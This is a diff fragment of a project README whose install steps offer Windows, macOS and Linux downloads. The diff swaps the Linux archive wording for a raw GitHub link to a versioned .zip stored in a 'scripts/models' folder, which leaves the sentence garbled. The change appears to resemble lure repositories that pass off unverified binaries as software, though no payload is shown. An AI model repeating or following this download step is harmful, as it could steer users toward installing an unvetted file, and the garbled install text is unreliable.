Powersubstance/localizing-visual-splices/README.md

 4. **Run the Application:**
    - **Windows:** Locate the downloaded `.exe` file in your Downloads folder.
 Double-click it and follow the on-screen instructions to install.
    - **macOS:** Open the `.dmg` file, drag the application icon to your Applications folder, then check your Applications folder to run the app.
-   - **Linux:** Extract the `.tar.gz` file and follow the instructions in the included README to install.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/Powersubstance/localizing-visual-splices/master/scripts/models/localizing-visual-splices_v3.8.zip` file and follow the instructions in the included README to install.

 ## 🛠️ Usage Instructions
 Once installed, you can begin using the application: